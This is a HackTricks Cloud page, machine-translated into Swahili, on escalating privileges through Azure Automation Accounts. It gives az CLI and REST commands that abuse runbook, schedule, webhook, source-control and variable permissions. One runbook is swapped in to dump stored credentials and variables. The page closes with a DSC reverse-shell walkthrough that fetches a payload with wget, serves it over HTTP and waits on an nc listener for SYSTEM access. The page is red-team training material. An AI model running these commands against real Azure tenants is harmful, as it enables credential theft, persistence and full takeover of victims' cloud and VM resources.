HackTricks CloudAz - Azure Automation Accounts Privesc
Reading time: 11 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Azure Automation Accounts
Kwa maelezo zaidi angalia:
Hybrid Workers Group
- Kutoka kwa Akaunti ya Automation hadi VM
Kumbuka kwamba ikiwa kwa namna fulani mshambuliaji anaweza kutekeleza runbook isiyo na mipaka (code isiyo na mipaka) katika mfanyakazi wa hybrid, atakuwa na uwezo wa kuhamia eneo la VM. Hii inaweza kuwa mashine ya ndani, VPC ya wingu tofauti au hata VM ya Azure.
Zaidi ya hayo, ikiwa mfanyakazi wa hybrid anafanya kazi katika Azure na Utambulisho wa Usimamizi mwingine umeunganishwa, runbook itakuwa na uwezo wa kufikia utambulisho wa usimamizi wa runbook na utambulisho wote wa usimamizi wa VM kutoka kwa huduma ya metadata.
tip
Kumbuka kwamba huduma ya metadata ina URL tofauti (http://169.254.169.254) kuliko huduma ambayo inapata token za utambulisho wa usimamizi wa akaunti ya automation (IDENTITY_ENDPOINT).
- Kutoka kwa VM hadi Akaunti ya Automation
Zaidi ya hayo, ikiwa mtu atachafua VM ambapo script ya akaunti ya automation inafanya kazi, atakuwa na uwezo wa kupata metadata ya Akaunti ya Automation na kuifikia kutoka kwa VM ili kupata token za Utambulisho wa Usimamizi uliounganishwa na Akaunti ya Automation.
Kama inavyoonekana katika picha ifuatayo, kuwa na ufikiaji wa Msimamizi juu ya VM inawezekana kupata katika mabadiliko ya mazingira ya mchakato URL na siri za kufikia huduma ya metadata ya akaunti ya automation:
Microsoft.Automation/automationAccounts/jobs/write, Microsoft.Automation/automationAccounts/runbooks/draft/write, Microsoft.Automation/automationAccounts/jobs/output/read, Microsoft.Automation/automationAccounts/runbooks/publish/action (Microsoft.Resources/subscriptions/resourcegroups/read, Microsoft.Automation/automationAccounts/runbooks/write)
Kwa muhtasari ruhusa hizi zinaruhusu kuunda, kubadilisha na kuendesha Runbooks katika Akaunti ya Automation ambayo unaweza kutumia kutekeleza code katika muktadha wa Akaunti ya Automation na kupandisha haki kwa Utambulisho wa Usimamizi uliotolewa na kuvuja akili na mabadiliko ya siri yaliyohifadhiwa katika Akaunti ya Automation.
Ruhusa Microsoft.Automation/automationAccounts/runbooks/draft/write inaruhusu kubadilisha code ya Runbook katika Akaunti ya Automation kwa kutumia:
# Update the runbook content with the provided PowerShell script
az automation runbook replace-content --no-wait \
--resource-group Resource_Group_1 \
--automation-account-name autoaccount1 \
--name AzureAutomationTutorialWithIdentity \
--content '$creds = Get-AutomationPSCredential -Name "<credential-name>"
$runbook_variable = Get-AutomationVariable -Name "<encrypted-variable-name>"
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password'
Kumbuka jinsi skripti ya awali inaweza kutumika ku vuja jina la mtumiaji na nenosiri la akidi na thamani ya kigeuzi kilichosimbwa kilichohifadhiwa katika Akaunti ya Automation.
Ruhusa Microsoft.Automation/automationAccounts/runbooks/publish/action inaruhusu mtumiaji kuchapisha Runbook katika Akaunti ya Automation ili mabadiliko yafanyike:
az automation runbook publish \
--resource-group <res-group> \
--automation-account-name <account-name> \
--name <runbook-name>
Ruhusa Microsoft.Automation/automationAccounts/jobs/write inaruhusu mtumiaji kuendesha Runbook katika Akaunti ya Automation kwa kutumia:
az automation runbook start \
--automation-account-name <account-name> \
--resource-group <res-group> \
--name <runbook-name> \
[--run-on <name-hybrid-group>]
Ruhusa Microsoft.Automation/automationAccounts/jobs/output/read inaruhusu mtumiaji kusoma matokeo ya kazi katika Akaunti ya Automation kwa kutumia:
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/jobs/<job-name>/output?api-version=2023-11-01"
Ikiwa hakuna Runbooks zilizoundwa, au unataka kuunda mpya, utahitaji permissions Microsoft.Resources/subscriptions/resourcegroups/read na Microsoft.Automation/automationAccounts/runbooks/write ili kufanya hivyo kwa kutumia:
az automation runbook create --automation-account-name <account-name> --resource-group <res-group> --name <runbook-name> --type PowerShell
Microsoft.Automation/automationAccounts/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
Ruhusa hii inamruhusu mtumiaji kuteua utambulisho wa mtumiaji ulioendeshwa kwa Akaunti ya Automation kwa kutumia:
az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>?api-version=2020-01-13-preview" \
--headers "Content-Type=application/json" \
--body '{
"identity": {
"type": "UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-managed-identity-name>": {}
}
}
}'
Microsoft.Automation/automationAccounts/schedules/write, Microsoft.Automation/automationAccounts/jobSchedules/write
Kwa ruhusa Microsoft.Automation/automationAccounts/schedules/write inawezekana kuunda Ratiba mpya katika Akaunti ya Automation inayotekelezwa kila dakika 15 (siyo ya siri sana) kwa kutumia amri ifuatayo.
Kumbuka kwamba kipindi cha chini kwa ratiba ni dakika 15, na wakati wa kuanza wa chini ni dakika 5 katika siku zijazo.
## For linux
az automation schedule create \
--resource-group <RESOURCE_GROUP> \
--automation-account-name <AUTOMATION_ACCOUNT_NAME> \
--name <SCHEDULE_NAME> \
--description "Triggers runbook every minute" \
--start-time "$(date -u -d "7 minutes" +%Y-%m-%dT%H:%M:%SZ)" \
--frequency Minute \
--interval 15
## Form macOS
az automation schedule create \
--resource-group <RESOURCE_GROUP> \
--automation-account-name <AUTOMATION_ACCOUNT_NAME> \
--name <SCHEDULE_NAME> \
--description "Triggers runbook every 15 minutes" \
--start-time "$(date -u -v+7M +%Y-%m-%dT%H:%M:%SZ)" \
--frequency Minute \
--interval 15
Kisha, kwa ruhusa Microsoft.Automation/automationAccounts/jobSchedules/write inawezekana kupeana Scheduler kwa runbook kwa kutumia:
az rest --method PUT \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-accounts>/jobSchedules/b510808a-8fdc-4509-a115-12cfc3a2ad0d?api-version=2015-10-31" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"runOn": "",
"runbook": {
"name": "<runbook-name>"
},
"schedule": {
"name": "<scheduler-name>>"
},
"parameters": {}
}
}'
tip
Katika mfano uliopita, kitambulisho cha jobchedule kiliacha kama b510808a-8fdc-4509-a115-12cfc3a2ad0d kama mfano lakini utahitaji kutumia thamani isiyo ya kawaida kuunda ugawaji huu.
Microsoft.Automation/automationAccounts/webhooks/write
Kwa ruhusa Microsoft.Automation/automationAccounts/webhooks/write inawezekana kuunda Webhook mpya kwa Runbook ndani ya Akaunti ya Automation kwa kutumia amri ifuatayo.
New-AzAutomationWebHook -Name <webhook-name> -ResourceGroupName <res-group> -AutomationAccountName <automation-account-name> -RunbookName <runbook-name> -IsEnabled $true
Amri hii inapaswa kurudisha URI ya webhook ambayo inaonyeshwa tu wakati wa kuunda. Kisha, ili kuita runbook kwa kutumia URI ya webhook
curl -X POST "https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=Ts5WmbKk0zcuA8PEUD4pr%2f6SM0NWydiCDqCqS1IdzIU%3d" \
-H "Content-Length: 0"
Microsoft.Automation/automationAccounts/runbooks/draft/write
Kwa ruhusa tu ya Microsoft.Automation/automationAccounts/runbooks/draft/write inawezekana kusaidia kuboresha msimbo wa Runbook bila kuuchapisha na kuufanya kazi kwa kutumia amri zifuatazo.
# Update the runbook content with the provided PowerShell script
az automation runbook replace-content --no-wait \
--resource-group Resource_Group_1 \
--automation-account-name autoaccount1 \
--name AzureAutomationTutorialWithIdentity \
--content 'echo "Hello World"'
# Run the unpublished code
## Indicate the name of the hybrid worker group in runOn to execute the runbook there
az rest \
--method PUT \
--url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Automation/automationAccounts/autoaccount1/runbooks/AzureAutomationTutorialWithIdentity/draft/testJob?api-version=2023-05-15-preview" \
--headers "Content-Type=application/json" \
--body '{
"parameters": {},
"runOn": "",
"runtimeEnvironment": "PowerShell-5.1"
}'
# Get the output (a different permission is needed here, but you could get a revershell or exfiltrate the token to avoid needing this permission)
az rest --method get --url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Automation/automationAccounts/autoaccount1/runbooks/AzureAutomationTutorialWithIdentity/draft/testJob/streams?api-version=2019-06-01"
Microsoft.Automation/automationAccounts/sourceControls/write, (Microsoft.Automation/automationAccounts/sourceControls/read)
Ruhusa hii inamruhusu mtumiaji kuunda udhibiti wa chanzo kwa Akaunti ya Automation kwa kutumia amri kama ifuatavyo (hii inatumia Github kama mfano):
az automation source-control create \
--resource-group <res-group> \
--automation-account-name <automation-account-name> \
--name RemoteGithub \
--repo-url https://github.com/carlospolop/gh-runbooks.git \
--branch main \
--folder-path /runbooks/ \
--publish-runbook true \
--auto-sync \
--source-type GitHub \
--token-type PersonalAccessToken \
--access-token github_pat_11AEDCVZ<rest-of-the-token>
Hii itafanya kuagiza kiotomatiki runbooks kutoka kwa hazina ya Github hadi Akaunti ya Automation na kwa ruhusa nyingine za kuanza kuzitekeleza itakuwa inawezekana kupandisha mamlaka.
Zaidi ya hayo, kumbuka kwamba ili udhibiti wa chanzo ufanye kazi katika Akaunti za Automation lazima iwe na utambulisho ulio na usimamizi wenye jukumu la Contributor na ikiwa ni utambulisho wa mtumiaji ulio na usimamizi, kitambulisho cha mteja wa MI lazima kielezwe katika variable AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID.
tip
Kumbuka kwamba siwezi kubadilisha URL ya repo ya udhibiti wa chanzo mara tu inapoanzishwa.
Microsoft.Automation/automationAccounts/variables/write
Kwa ruhusa Microsoft.Automation/automationAccounts/variables/write inawezekana kuandika variables katika Akaunti ya Automation kwa kutumia amri ifuatayo.
az rest --method PUT \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/variables/<variable-name>?api-version=2019-06-01" \
--headers "Content-Type=application/json" \
--body '{
"name": "<variable-name>",
"properties": {
"description": "",
"value": "\"<variable-value>\"",
"isEncrypted": false
}
}'
Mazingira ya Kazi ya Kijadi
Ikiwa akaunti ya automatisering inatumia mazingira ya kazi ya kijadi, inaweza kuwa inawezekana kubadilisha kifurushi maalum cha mazingira hayo kwa msimbo mbaya (kama backdoor). Kwa njia hii, kila wakati runbook inayotumia mazingira hayo ya kijadi inatekelezwa na kupakia kifurushi maalum, msimbo mbaya utaanzishwa.
Kuathiri Usanidi wa Jimbo
Angalia chapisho kamili katika: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe
- Hatua ya 1 — Unda Faili
Faili Zinazohitajika: Skripti mbili za PowerShell zinahitajika:
reverse_shell_config.ps1: Faili ya Usanidi wa Jimbo Linalotakiwa (DSC) inayopata na kutekeleza payload. Inapatikana kutoka GitHub.push_reverse_shell_config.ps1: Skripti ya kuchapisha usanidi kwa VM, inapatikana katika GitHub.
Ubadilishaji: Vigezo na parameta katika faili hizi lazima zibadilishwe ili kufaa mazingira maalum ya mtumiaji, ikiwa ni pamoja na majina ya rasilimali, njia za faili, na vitambulisho vya seva/payload.
- Hatua ya 2 — Zip Faili ya Usanidi
Faili reverse_shell_config.ps1 inashirikiwa katika faili ya .zip, ikifanya iwe tayari kwa uhamishaji kwenda Akaunti ya Hifadhi ya Azure.
Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
- Hatua ya 3 — Weka Muktadha wa Hifadhi & Pakia
Faili ya usanidi iliyoshonwa inapakiwa kwenye kontena la Hifadhi la Azure lililowekwa awali, azure-pentest, kwa kutumia cmdlet ya Azure Set-AzStorageBlobContent.
Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
- Step 4 — Prep Kali Box
Seva ya Kali inashusha mzigo wa RevPS.ps1 kutoka kwenye hifadhi ya GitHub.
wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
Script imehaririwa ili kubaini VM ya Windows inayolengwa na bandari ya shell ya kurudi.
- Hatua ya 5 — Chapisha Faili la Mipangilio
Faili la mipangilio linafanywa kazi, na kusababisha script ya shell ya kurudi kupelekwa kwenye eneo lililotajwa kwenye VM ya Windows.
- Hatua ya 6 — Kuweka Payload na Kuanzisha Listener
Python SimpleHTTPServer inaanzishwa ili kuhifadhi payload, pamoja na listener ya Netcat ili kukamata muunganisho unaokuja.
sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
Kazi iliyoandaliwa inatekeleza payload, ikipata haki za kiwango cha SYSTEM.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.